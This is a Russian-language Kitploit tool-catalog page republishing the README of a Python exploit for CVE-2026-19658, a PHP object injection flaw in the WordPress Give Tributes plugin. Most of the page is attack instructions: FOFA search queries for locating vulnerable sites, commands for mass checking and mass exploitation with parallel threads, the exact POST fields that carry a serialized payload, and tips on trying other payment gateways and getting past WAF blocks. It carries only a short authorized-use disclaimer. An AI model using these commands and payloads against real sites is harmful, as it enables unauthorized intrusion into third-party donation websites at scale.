Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-19658 — Python 3-инструмент для проверки и эксплуатации CVE-2026-19658 — уязвимости инъекции PHP-объектов в WordPress-плагине Give Tributes, с поиском целей через FOFA и эксплуатацией устаревшей формы пожертвований. | Kitploit
Инструменты/GitHubGitHub/murrez/cve-2026-19658
РазведкаСканеры уязвимостейАнализ уязвимостейЭксплуатацияСкриптинг и автоматизацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHub
151 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
murrez/cve-2026-19658

CVE-2026-19658

Python 3-инструмент для проверки и эксплуатации CVE-2026-19658 — уязвимости инъекции PHP-объектов в WordPress-плагине Give Tributes, с поиском целей через FOFA и эксплуатацией устаревшей формы пожертвований.

Репозиторий
Поделиться

CVE-2026-19658 — Неаутентифицированная инъекция PHP-объектов в Give Tributes

Python 3 proof-of-concept сканер и вспомогательный эксплойт цепочки донатов для CVE-2026-19658 в WordPress-дополнении Give - Tributes (Liquid Web / GiveWP).

ПлатформаWordPress-плагин (требуется ядро GiveWP)
КомпонентGive - Tributes
Уязвимые версии≤ 2.3.1
Исправлено в2.3.1.1+ (санитизированные поля eCard с несколькими получателями)
CVSS9.8 Critical
АутентификацияНе требуется (устаревшая форма донатов)
CWECWE-502 — Десериализация недоверенных данных
НазначившийWordfence

Краткое описание

Когда для eCard включена опция Allow Multiple Recipients, а eCard custom message отключено (по умолчанию), уязвимые версии сохраняют сырые данные получателей eCard из $_POST в метаданных доната. Валидация полей GiveWP использует копию $_POST, обработанную give_clean() (сериализованные строки там обнуляются), но insert_tribute_data() читает несанитизированный $_POST, поэтому first_name / last_name второго получателя могут содержать сериализованный PHP-объект.

Воздействие: Известной POP-цепочки внутри одного Give Tributes нет. Метаданные десериализуются при чтении (например, при предпросмотре/повторной отправке eCard в админке). RCE или деструктивное воздействие требует gadget-цепочки из другого установленного плагина или темы.

Серверные предпосылки

  1. Give Tributes ≤ 2.3.1
  2. Включена опция Allow Multiple Recipients (глобально или для конкретной формы)
  3. Отключено Custom Message для eCard (по умолчанию)
  4. Публичная устаревшая форма Give ([give_form] / v2), а не только v3 Visual Form Builder
  5. Платёжный шлюз, способный завершить донат в вашем тесте (часто manual на dev/staging)

Требования

  • Python 3.8+
  • pip install -r requirements.txt

Быстрый старт

root@kitploit:~
pip install -r requirements.txt

# Single target — check (terminal flow on by default for --list)
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 20 --flow

# Single target — exploit (authorized targets only)
python poc.py -u https://target.example --mode exploit \
  --form-url /donate/ --form-id 123 --gateway manual \
  --payload 'O:8:"stdClass":0:{}'

# Mass exploit from check output
python poc.py --list candidates.jsonl --mode exploit --threads 8 --flow \
  --vuln-list exploited.txt

FOFA → список целей

Примеры:

root@kitploit:~
body="/wp-content/plugins/give-tributes/"
body="give-tributes" && body="givewp"

Список хостов (один домен на строку):

root@kitploit:~
python poc.py --list my_hosts.txt --mode check --threads 20 --flow

Экспорт FOFA CSV:

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
python poc.py --list list.txt --mode check --threads 20

Опции CLI

Используйте --vuln-list exploited.txt при запусках эксплойта, чтобы попадания проверки в hits.txt не перезаписывались.

Выходные файлы

Значения status при проверке

Удалённое сканирование не может надёжно увидеть «Allow Multiple Recipients»; кандидаты всё ещё могут не пройти на этапе эксплойта.

Заметки об эксплойте

  • PoC отправляет двух получателей eCard; payload — это второе поле first_name.
  • Шлюз manual часто отключён в продакшене — попробуйте шлюзы, видимые на форме (stripe, paypal, test, …).
  • Успех требует маркеров квитанции Give (а не общего текста страницы, содержащего «thank you»). Тот же URL с всё ещё присутствующей формой не считается успехом.
  • give validation rejected donation: несоответствие опций tribute/notify, суммы или шлюза.
  • HTTP 403: WAF (Sucuri, MalCare и т. д.) блокирует POST.
  • Формы только v3: используйте URL устаревшей формы или пропустите (процессор отклоняет ID v3 на устаревшей конечной точке).

Структура POST (устаревшая форма)

root@kitploit:~
give_tributes_show_dedication=yes
give_tributes_would_to=send_eCard
give_tributes_ecard_notify[recipient][first_name][]=Valid
give_tributes_ecard_notify[recipient][first_name][]=<serialized payload>
give_tributes_ecard_notify[recipient][email][]=<donor email>
give_tributes_ecard_notify[recipient][email][][email protected]
…

Структура репозитория

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Локальные списки сканирования и артефакты запусков (list.txt, fofa*.csv, *.jsonl, hits.txt, …) находятся в .gitignore и не должны коммититься.

Ссылки

  • NVD — CVE-2026-19658
  • Give Tributes readme (fix note 2.3.1.1)
  • GiveWP plugin

Правовая информация

Только для авторизованного тестирования безопасности и обучения. Вы несёте ответственность за соблюдение применимых законов и правил программ.

Скачать инструмент
ОпцияОписание
-u, --urlОдин базовый URL
--listСписок URL, файл хостов или candidates.jsonl
--modecheck или exploit
--form-urlПуть к странице донатов или полный URL
--form-idID записи формы Give
--pathsДополнительные пути для обхода в поисках форм
--payloadСериализованный объект для first_name второго получателя
--gatewaypayment-mode Give (по умолчанию manual)
--emailgive_email донора
--flowОдна строка на цель при массовых запусках (по умолчанию с --list)
--no-flowТолько сводка о прогрессе
--quiet, -qМинимальный вывод в консоль
--threads, -jПараллелизм при массовых запусках (по умолчанию 12)
--outputJSONL-лог (по умолчанию cve_2026_19658_results.jsonl)
--vuln-listТекстовые попадания / строки эксплойта (по умолчанию hits.txt)
--candidates-listJSONL с метаданными проверки (по умолчанию candidates.jsonl)
ФайлРежимСодержимое
cve_2026_19658_results.jsonlобаПолный JSON по каждой цели
hits.txtcheckURL с exploitable_candidate
candidates.jsonlcheckbest_form, подсказки о версии
exploited.txtexploiturl|payment=… при подтверждённом донате
СтатусЗначение
candidateУязвимый плагин + Give + устаревшая форма с UI tributes
vulnerable_no_formПлагин/версия в порядке, подходящая форма не найдена на обойдённых путях
patchedTributes > 2.3.1 или ≥ 2.3.1.1 (когда версия читается)
give_onlyGive без обнаруживаемых Tributes
no_pluginTributes не обнаружен